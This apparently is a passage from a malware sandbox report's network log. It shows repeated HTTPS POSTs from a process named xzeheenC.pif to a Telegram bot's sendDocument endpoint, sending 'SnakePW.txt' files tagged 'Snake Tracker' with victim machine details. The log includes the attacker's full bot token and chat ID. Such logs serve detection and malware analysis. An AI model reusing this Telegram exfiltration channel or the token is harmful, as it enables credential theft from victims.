                                                                                                        2024-12-18 15:32:06 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419188,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535926,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        86192.168.2.849849149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:06 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2281f045fe39
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:06 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 38 31 66 30 34 35 66 65 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2281f045fe39Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:06 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:06 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:06 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419190,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535926,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        87192.168.2.849855149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:07 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21fd08727360
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:07 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 66 64 30 38 37 32 37 33 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21fd08727360Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:07 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:07 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:07 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419192,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535927,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        88192.168.2.849856149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:07 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd215a5df1d419
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:07 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 35 61 35 64 66 31 64 34 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd215a5df1d419Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:08 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:08 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:08 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419194,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535928,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        89192.168.2.849857149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:08 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22b505293680
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:08 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 62 35 30 35 32 39 33 36 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd22b505293680Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:08 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:08 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:08 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419196,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535928,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        90192.168.2.849862149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:09 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd222ae7dea767
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:09 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 32 61 65 37 64 65 61 37 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd222ae7dea767Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:09 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:09 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:09 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419198,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535929,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        91192.168.2.849864149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:09 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2177fa1de5ca
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:32:09 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 37 37 66 61 31 64 65 35 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2177fa1de5caContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:10 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:10 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:10 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419200,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535930,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        92192.168.2.849865149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:10 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22e92e63468f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:10 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 65 39 32 65 36 33 34 36 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd22e92e63468fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:10 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:10 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
